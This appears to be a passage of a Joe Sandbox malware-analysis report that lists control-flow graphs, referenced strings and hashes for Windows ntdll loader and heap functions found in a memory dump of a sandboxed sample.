                                        control_flow_graph 310 32947550-32947571 311 32947573-3294758f call 3291e580 310->311 312 329475ab-329475b9 call 32954b50 310->312 317 32947595-329475a2 311->317 318 32984443 311->318 319 329475a4 317->319 320 329475ba-329475c9 call 32947738 317->320 322 3298444a-32984450 318->322 319->312 327 32947621-3294762a 320->327 328 329475cb-329475e1 call 329476ed 320->328 324 329475e7-329475f0 call 32947648 322->324 325 32984456-329844c3 call 3299ef10 call 32958f40 RtlDebugPrintTimes BaseQueryModuleData 322->325 324->327 334 329475f2 324->334 325->324 342 329844c9-329844d1 325->342 332 329475f8-32947601 327->332 328->322 328->324 336 32947603-32947612 call 3294763b 332->336 337 3294762c-3294762e 332->337 334->332 341 32947614-32947616 336->341 337->341 344 32947630-32947639 341->344 345 32947618-3294761a 341->345 342->324 346 329844d7-329844de 342->346 344->345 345->319 347 3294761c 345->347 346->324 348 329844e4-329844ef 346->348 349 329845c9-329845db call 32952b70 347->349 351 329845c4 call 32954c68 348->351 352 329844f5-3298452e call 3299ef10 call 3295a9c0 348->352 349->319 351->349 359 32984530-32984541 call 3299ef10 352->359 360 32984546-32984576 call 3299ef10 352->360 359->327 360->324 365 3298457c-3298458a call 3295a690 360->365 368 3298458c-3298458e 365->368 369 32984591-329845ae call 3299ef10 call 3298cc1e 365->369 368->369 369->324 374 329845b4-329845bd 369->374 374->365 375 329845bf 374->375 375->324
                                        Strings
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 32984592
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32984507
                                        • ExecuteOptions, xrefs: 329844AB
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3298454D
                                        • Execute=1, xrefs: 3298451E
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32984460
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32984530
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: 6fe2c32511081250ba7c11d0f6cd86d869a01cf1085bb39bfbe880c3edc5351e
                                        • Instruction ID: f6694dd2d51d233c418931ccea63c8ee28e8770881d888165514888b28b38cb2
                                        • Opcode Fuzzy Hash: 6fe2c32511081250ba7c11d0f6cd86d869a01cf1085bb39bfbe880c3edc5351e
                                        • Instruction Fuzzy Hash: BE510475A0031DBAEB14DBA5EC94FED73ADAF08344F4404EAE505AB181EF709A45CFA1
                                        Function 3292A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 376 3292a170-3292a18f 377 3292a195-3292a1b1 376->377 378 3292a4ad-3292a4b4 376->378 379 329777f3-329777f8 377->379 380 3292a1b7-3292a1c0 377->380 378->377 381 3292a4ba-329777c8 378->381 380->379 382 3292a1c6-3292a1cc 380->382 381->377 386 329777ce-329777d3 381->386 384 3292a1d2-3292a1d4 382->384 385 3292a5da-3292a5dc 382->385 384->379 387 3292a1da-3292a1dd 384->387 385->387 388 3292a5e2 385->388 389 3292a393-3292a399 386->389 387->379 390 3292a1e3-3292a1e6 387->390 388->390 391 3292a1fa-3292a1fd 390->391 392 3292a1e8-3292a1f1 390->392 395 3292a203-3292a24b 391->395 396 3292a5e7-3292a5f0 391->396 393 3292a1f7 392->393 394 329777d8-329777e2 392->394 393->391 398 329777e7-329777f0 call 3299ef10 394->398 399 3292a250-3292a255 395->399 396->395 397 3292a5f6-3297780c 396->397 397->398 398->379 402 3292a25b-3292a263 399->402 403 3292a39c-3292a39f 399->403 405 3292a26f-3292a27d 402->405 407 3292a265-3292a269 402->407 404 3292a3a5-3292a3a8 403->404 403->405 408 32977823-32977826 404->408 409 3292a3ae-3292a3be 404->409 405->409 411 3292a283-3292a288 405->411 407->405 410 3292a4bf-3292a4c8 407->410 412 3297782c-32977831 408->412 413 3292a28c-3292a28e 408->413 409->408 414 3292a3c4-3292a3cd 409->414 415 3292a4e0-3292a4e3 410->415 416 3292a4ca-3292a4cc 410->416 411->413 417 32977838 412->417 421 32977833 413->421 422 3292a294-3292a2ac call 3292a600 413->422 414->413 419 3297780e 415->419 420 3292a4e9-3292a4ec 415->420 416->405 418 3292a4d2-3292a4db 416->418 424 3297783a-3297783c 417->424 418->413 426 32977819 419->426 425 3292a4f2-3292a4f5 420->425 420->426 421->417 429 3292a3d2-3292a3d9 422->429 430 3292a2b2-3292a2da 422->430 424->389 428 32977842 424->428 425->416 426->408 431 3292a2dc-3292a2de 429->431 432 3292a3df-3292a3e2 429->432 430->431 431->424 433 3292a2e4-3292a2eb 431->433 432->431 434 3292a3e8-3292a3f3 432->434 435 3292a2f1-3292a2f4 433->435 436 329778ed 433->436 434->399 437 3292a300-3292a30a 435->437 438 329778f1-32977909 call 3299ef10 436->438 437->438 439 3292a310-3292a32c call 3292a760 437->439 438->389 444 3292a332-3292a337 439->444 445 3292a4f7-3292a500 439->445 444->389 448 3292a339-3292a35d 444->448 446 3292a502-3292a50b 445->446 447 3292a521-3292a523 445->447 446->447 449 3292a50d-3292a511 446->449 450 3292a525-3292a543 call 32914428 447->450 451 3292a549-3292a551 447->451 452 3292a360-3292a363 448->452 453 3292a5a1-3292a5cb RtlDebugPrintTimes 449->453 454 3292a517-3292a51b 449->454 450->389 450->451 456 3292a3f8-3292a3fc 452->456 457 3292a369-3292a36c 452->457 453->447 472 3292a5d1-3292a5d5 453->472 454->447 454->453 459 32977847-3297784f 456->459 460 3292a402-3292a405 456->460 461 3292a372-3292a374 457->461 462 329778e3 457->462 464 32977855-32977859 459->464 465 3292a554-3292a56a 459->465 460->465 466 3292a40b-3292a40e 460->466 467 3292a440-3292a459 call 3292a600 461->467 468 3292a37a-3292a381 461->468 462->436 464->465 473 3297785f-32977868 464->473 474 3292a570-3292a579 465->474 475 3292a414-3292a42c 465->475 466->457 466->475 482 3292a57e-3292a585 467->482 483 3292a45f-3292a487 467->483 470 3292a387-3292a38c 468->470 471 3292a49b-3292a4a2 468->471 470->389 477 3292a38e 470->477 471->437 478 3292a4a8 471->478 472->447 479 32977892-32977894 473->479 480 3297786a-3297786d 473->480 474->461 475->457 481 3292a432-3292a43b 475->481 477->389 478->436 479->465 484 3297789a-329778a3 479->484 485 3297786f-32977879 480->485 486 3297787b-3297787e 480->486 481->461 487 3292a489-3292a48b 482->487 488 3292a58b-3292a58e 482->488 483->487 484->461 489 3297788e 485->489 490 32977880-32977889 486->490 491 3297788b 486->491 487->470 492 3292a491-3292a493 487->492 488->487 493 3292a594-3292a59c 488->493 489->479 490->484 491->489 494 3292a499 492->494 495 329778a8-329778b1 492->495 493->452 494->471 495->494 496 329778b7-329778bd 495->496 496->494 497 329778c3-329778cb 496->497 497->494 498 329778d1-329778dc 497->498 498->497 499 329778de 498->499 499->494
                                        Strings
                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 329777DD, 32977802
                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 329778F3
                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 329777E2
                                        • Actx , xrefs: 32977819, 32977880
                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32977807
                                        • SsHd, xrefs: 3292A304
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                        • API String ID: 0-1988757188
                                        • Opcode ID: f77e359d2ae17225e3d2c6c1c964323dd446cb2f96a4a04b1d4457854a37eadd
                                        • Instruction ID: 0fbc287ff90a6aed9cfb923ae0135d157848ef4e1228c8d899994371ed1d9e0a
                                        • Opcode Fuzzy Hash: f77e359d2ae17225e3d2c6c1c964323dd446cb2f96a4a04b1d4457854a37eadd
                                        • Instruction Fuzzy Hash: D8E1057660430A8FE714CE28C990B9BB7E9BF85368F500A2DFC55CB295DB31D849CB91
                                        Function 3292D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 500 3292d690-3292d6cb 501 3292d6d1-3292d6db 500->501 502 3292d907-3292d90e 500->502 504 32979164 501->504 505 3292d6e1-3292d6ea 501->505 502->501 503 3292d914-32979139 502->503 503->501 511 3297913f-32979144 503->511 508 3297916e-3297917d 504->508 505->504 507 3292d6f0-3292d6f3 505->507 509 3292d8fa-3292d8fc 507->509 510 3292d6f9-3292d6fb 507->510 514 32979158-32979161 call 3299ef10 508->514 512 3292d902 509->512 513 3292d701-3292d704 509->513 510->504 510->513 515 3292d847-3292d858 call 32954b50 511->515 516 3292d70a-3292d70d 512->516 513->504 513->516 514->504 521 3292d713-3292d716 516->521 522 3292d919-3292d922 516->522 524 3292d71c-3292d768 call 3292d580 521->524 525 3292d92d-3292d936 521->525 522->521 523 3292d928-32979153 522->523 523->514 524->515 530 3292d76e-3292d772 524->530 525->524 527 3292d93c 525->527 527->508 530->515 531 3292d778-3292d77f 530->531 532 3292d8f1-3292d8f5 531->532 533 3292d785-3292d789 531->533 534 32979370-32979388 call 3299ef10 532->534 535 3292d790-3292d79a 533->535 534->515 535->534 536 3292d7a0-3292d7a7 535->536 538 3292d7a9-3292d7ad 536->538 539 3292d80d-3292d82d 536->539 541 3292d7b3-3292d7b8 538->541 542 3297917f 538->542 543 3292d830-3292d833 539->543 544 32979186-32979188 541->544 545 3292d7be-3292d7c5 541->545 542->544 546 3292d835-3292d838 543->546 547 3292d85b-3292d860 543->547 544->545 552 3297918e-329791b7 544->552 553 329791f7-329791fa 545->553 554 3292d7cb-3292d803 call 32958170 545->554 548 32979366-3297936b 546->548 549 3292d83e-3292d840 546->549 550 3292d866-3292d869 547->550 551 329792e0-329792e8 547->551 548->515 555 3292d842 549->555 556 3292d891-3292d8ac call 3292a600 549->556 557 3292d941-3292d94f 550->557 558 3292d86f-3292d872 550->558 551->557 559 329792ee-329792f2 551->559 552->539 560 329791bd-329791d7 call 32968050 552->560 562 329791fe-3297920d call 32968050 553->562 576 3292d805-3292d807 554->576 555->515 582 3292d8b2-3292d8da 556->582 583 32979335-3297933a 556->583 563 3292d874-3292d884 557->563 566 3292d955-3292d95e 557->566 558->546 558->563 559->557 564 329792f8-32979301 559->564 560->576 581 329791dd-329791f0 560->581 577 32979224 562->577 578 3297920f-3297921d 562->578 563->546 571 3292d886-3292d88f 563->571 572 32979303-32979306 564->572 573 3297931f-32979321 564->573 566->549 571->549 579 32979310-32979313 572->579 580 32979308-3297930e 572->580 573->557 585 32979327-32979330 573->585 576->539 584 3297922d-32979231 576->584 577->584 578->562 588 3297921f 578->588 590 32979315-3297931a 579->590 591 3297931c 579->591 580->573 581->560 592 329791f2 581->592 587 3292d8dc-3292d8de 582->587 586 32979340-32979343 583->586 583->587 584->539 589 32979237-3297923d 584->589 585->549 586->587 593 32979349-32979351 586->593 596 32979356-3297935b 587->596 597 3292d8e4-3292d8eb 587->597 588->539 594 32979264-3297926d 589->594 595 3297923f-3297925c 589->595 590->585 591->573 592->539 593->543 600 329792b4-329792b6 594->600 601 3297926f-32979274 594->601 595->594 599 3297925e-32979261 595->599 596->515 598 32979361 596->598 597->532 597->535 598->548 599->594 602 329792d9-329792db 600->602 603 329792b8-329792d3 call 32914428 600->603 601->600 604 32979276-3297927a 601->604 602->515 603->515 603->602 606 32979282-329792ae RtlDebugPrintTimes 604->606 607 3297927c-32979280 604->607 606->600 610 329792b0 606->610 607->600 607->606 610->600
                                        APIs
                                        Strings
                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32979372
                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 3297914E, 32979173
                                        • GsHd, xrefs: 3292D794
                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32979153
                                        • Actx , xrefs: 32979315
                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32979178
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                        • API String ID: 3446177414-2196497285
                                        • Opcode ID: 2f54d51c41630cad3fd4d2d0e2968158ea759b023c5242af90535c7fc212d10b
                                        • Instruction ID: 64c30afee774691c5c050d9bcccbfab06d6bf0e18810676c563e8a7a10d6e1d1
                                        • Opcode Fuzzy Hash: 2f54d51c41630cad3fd4d2d0e2968158ea759b023c5242af90535c7fc212d10b
                                        • Instruction Fuzzy Hash: 83E1C374604346CFE714CF18C880B5AB7F8FF88758F504A6DE9959B285DB71E848CBA2
                                        Function 3298FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 749 3298fa02-3298fa3a call 3298f899 752 3298fa7a-3298fa7c 749->752 753 3298fa3c-3298fa40 749->753 754 3298fa7e 752->754 755 3298fa7f-3298fa81 752->755 756 3298fa42 753->756 757 3298fa47-3298fa77 call 3298e692 753->757 754->755 758 3298fa99 755->758 759 3298fa83-3298fa8d 755->759 756->757 757->752 761 3298fa9b 758->761 759->761 762 3298fa8f-3298fa93 759->762 765 3298fa9d-3298faa2 761->765 762->761 764 3298fa95-3298fa97 762->764 764->765 766 3298fb01-3298fb06 765->766 767 3298faa4-3298faa6 765->767 768 3298fb08-3298fb0a 766->768 769 3298fb1f-3298fb25 766->769 767->766 770 3298faa8-3298fad4 call 32946010 767->770 771 3298fb0c 768->771 772 3298fb0f-3298fb1d RtlDebugPrintTimes 768->772 776 3298fae2-3298fae8 770->776 777 3298fad6-3298fae0 770->777 771->772 772->769 778 3298faeb-3298faff RtlDebugPrintTimes 776->778 777->778 778->766 778->769
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                        • API String ID: 3446177414-4227709934
                                        • Opcode ID: 67a69e10f5c145cf8522e6ec732a682b7aeb27f84d03e3a7e78ff79842393a66
                                        • Instruction ID: d7d92a1708f88677b6df160fe7cfc34cd3d60ab690c1f92228122fe0cd23b3de
                                        • Opcode Fuzzy Hash: 67a69e10f5c145cf8522e6ec732a682b7aeb27f84d03e3a7e78ff79842393a66
                                        • Instruction Fuzzy Hash: 74415CB9A01209ABDB01CF99C990ADEBBB9FF48754F544069ED04B7350DB71EE42CB90
                                        Function 329BF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 901 329bf8f8-329bf91f call 32967be4 904 329bf93e-329bf956 call 32907662 901->904 905 329bf921-329bf939 RtlDebugPrintTimes 901->905 910 329bfb8c-329bfb8e 904->910 911 329bf95c-329bf972 904->911 909 329bfba2-329bfbb1 905->909 912 329bfb91-329bfba0 call 329bfbb7 910->912 913 329bf98e-329bf9a1 call 329c0835 911->913 914 329bf974-329bf98b call 3291fed0 911->914 912->909 921 329bf9ac-329bf9c0 call 3290753f 913->921 922 329bf9a3-329bf9aa 913->922 914->913 921->912 925 329bf9c6-329bf9d5 GetPEB 921->925 922->921 926 329bfa1b-329bfa26 925->926 927 329bf9d7-329bf9da 925->927 928 329bfb2b-329bfb50 call 32923bc0 call 329c0d24 call 329c0835 926->928 929 329bfa2c-329bfa33 926->929 930 329bf9f9-329bf9fe call 3290b910 927->930 931 329bf9dc-329bf9f7 GetPEB call 3290b910 927->931 928->912 929->928 932 329bfa39-329bfa42 929->932 939 329bfa03-329bfa16 call 3290b910 930->939 931->939 936 329bfa63-329bfa67 932->936 937 329bfa44-329bfa54 932->937 943 329bfa79-329bfa7f 936->943 944 329bfa69-329bfa77 call 32943ae9 936->944 937->936 942 329bfa56-329bfa60 call 329cd646 937->942 956 329bfb0b-329bfb15 GetPEB 939->956 942->936 949 329bfa82-329bfa8b 943->949 944->949 954 329bfa9d-329bfaa0 949->954 955 329bfa8d-329bfa9b 949->955 954->928 959 329bfaa6-329bfaad 954->959 955->954 956->928 958 329bfb17-329bfb25 956->958 958->928 959->928 960 329bfaaf-329bfaba 959->960 960->928 961 329bfabc-329bfac5 GetPEB 960->961 962 329bfac7-329bfae2 GetPEB call 3290b910 961->962 963 329bfae4-329bfae9 call 3290b910 961->963 967 329bfaee-329bfb08 call 329b823a call 3290b910 962->967 963->967 967->956
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                        • API String ID: 3446177414-3492000579
                                        • Opcode ID: d66e6246259b2c56883666b549cb18b23fc84ee6bd7de57ea931a28c93bd00cd
                                        • Instruction ID: cff6a4402064a3b6905a83778f18ed8057ee2be659e1bfd0770542c8932d2616
                                        • Opcode Fuzzy Hash: d66e6246259b2c56883666b549cb18b23fc84ee6bd7de57ea931a28c93bd00cd
                                        • Instruction Fuzzy Hash: 9571DB35901688DFDF05CFA8D490AADFBF6FF49308F44C45AE445AB292CB759982CB50
                                        Function 32906565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 972 32906565-329065b8 call 3292e8a6 975 32906637 972->975 976 329065ba-329065d9 call 32955050 call 32906b45 972->976 978 3290663a-3290663e 975->978 987 32969835-3296983c 976->987 988 329065df-329065fb call 32947df6 976->988 980 32906644-32906697 RtlDebugPrintTimes call 3291fed0 978->980 981 329066f7-329066ff call 3293e7e0 978->981 995 329698c3-329698c8 980->995 996 3290669d-329066aa 980->996 981->980 992 32969866-32969868 987->992 993 3296983e-32969863 call 3298e692 987->993 1000 329065fd-32906606 call 329316ee 988->1000 1001 3290660f-32906632 RtlDebugPrintTimes call 3292d3e1 988->1001 998 3296986a 992->998 999 3296986b-3296986d 992->999 993->992 1005 329698d3-329698d5 995->1005 1002 329066ac 996->1002 1003 329066ae-329066b0 996->1003 998->999 1006 32969875-3296987e 999->1006 1000->1006 1022 3290660c 1000->1022 1001->976 1029 32906634-32906636 1001->1029 1002->1003 1008 329066b2-329066c7 call 32906704 1003->1008 1009 329066c9-329066f6 call 3291e740 call 3290676f call 32954b50 1003->1009 1010 329698d7 1005->1010 1011 329698ca-329698d1 1005->1011 1012 329698a7-329698a9 1006->1012 1013 32969880-329698a4 call 3298e692 1006->1013 1008->1009 1010->1010 1011->1005 1020 329698ac-329698be call 32991d5e call 32952c70 1012->1020 1021 329698ab 1012->1021 1013->1012 1020->978 1021->1020 1022->1001 1029->975
                                        APIs
                                        Strings
                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32969843
                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32969885
                                        • LdrpLoadShimEngine, xrefs: 3296984A, 3296988B
                                        • minkernel\ntdll\ldrinit.c, xrefs: 32969854, 32969895
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-3589223738
                                        • Opcode ID: ad25fecece2ba27fda5922caa7ea060457be2e94b746d84b8e57dd3fc105c459
                                        • Instruction ID: 9e1753e949e8ac112481c74034ebd6250ca8546f315682b30b36857141708ed3
                                        • Opcode Fuzzy Hash: ad25fecece2ba27fda5922caa7ea060457be2e94b746d84b8e57dd3fc105c459
                                        • Instruction Fuzzy Hash: DF512875A113589FEB14DBACC854BADB7AABB44318F048519E540BF29ACB70AC43CB90
                                        Function 3293DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                        • API String ID: 3446177414-3224558752
                                        • Opcode ID: fdb3f01c004843b0d3ab83e3649f9281f42839905717097f166374e8eee9e51f
                                        • Instruction ID: 39594b52dfab54bcb18c1b658726f5512311e215427d6d4ec36f59e3fdc91995
                                        • Opcode Fuzzy Hash: fdb3f01c004843b0d3ab83e3649f9281f42839905717097f166374e8eee9e51f
                                        • Instruction Fuzzy Hash: 94415C35605745DFE712CF28C554B59B3B8FF41328F0089A9E92AD7381CB78E985CB61
                                        Function 3293DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                        • API String ID: 3446177414-1222099010
                                        • Opcode ID: c2fbd1ded305cac7130a9bb017265f097f59d3787cf6639c11e54cdbb18bb7f8
                                        • Instruction ID: 81ee4179cd5a91526f2f7b5cc9049682e823f0e6acec2269acefbbacf843e6f7
                                        • Opcode Fuzzy Hash: c2fbd1ded305cac7130a9bb017265f097f59d3787cf6639c11e54cdbb18bb7f8
                                        • Instruction Fuzzy Hash: A7312739506788DFF726CB28C424F9977FCEF02758F008889E81257652CBB9E981CA61
                                        Function 32919046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$@
                                        • API String ID: 3446177414-1194432280
                                        • Opcode ID: 3a14eb2b6e2ab2469bd28a5c31b733c0499b2b8c77870f9e0ef42ab67d72ba30
                                        • Instruction ID: 18070c462eecf03e8763594d2f1f0dfc496703c0670e380431745195b0d5c2fd
                                        • Opcode Fuzzy Hash: 3a14eb2b6e2ab2469bd28a5c31b733c0499b2b8c77870f9e0ef42ab67d72ba30
                                        • Instruction Fuzzy Hash: 28812BB5D012699BEB25CB54CC44BDEB7B8AF08754F0041EAEA19B7240DB709E85CFA0
                                        Function 3290F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 3446177414-3610490719
                                        • Opcode ID: c6613359c89dfbce05ee0bc42f824617ebe08a2e65d3122cd90b99d252ba7e9c
                                        • Instruction ID: 145254337cf21e664e77a09bf441a6e551c7cc74fc45d0e8cde70e0fe052c2c0
                                        • Opcode Fuzzy Hash: c6613359c89dfbce05ee0bc42f824617ebe08a2e65d3122cd90b99d252ba7e9c
                                        • Instruction Fuzzy Hash: 3F912575B04748AFE715CF24C880B2AB7E9BF44758F008459E9949B282EF74E945CF92
                                        Function 32930AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • Failed to allocated memory for shimmed module list, xrefs: 32979F1C
                                        • LdrpCheckModule, xrefs: 32979F24
                                        • minkernel\ntdll\ldrinit.c, xrefs: 32979F2E
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
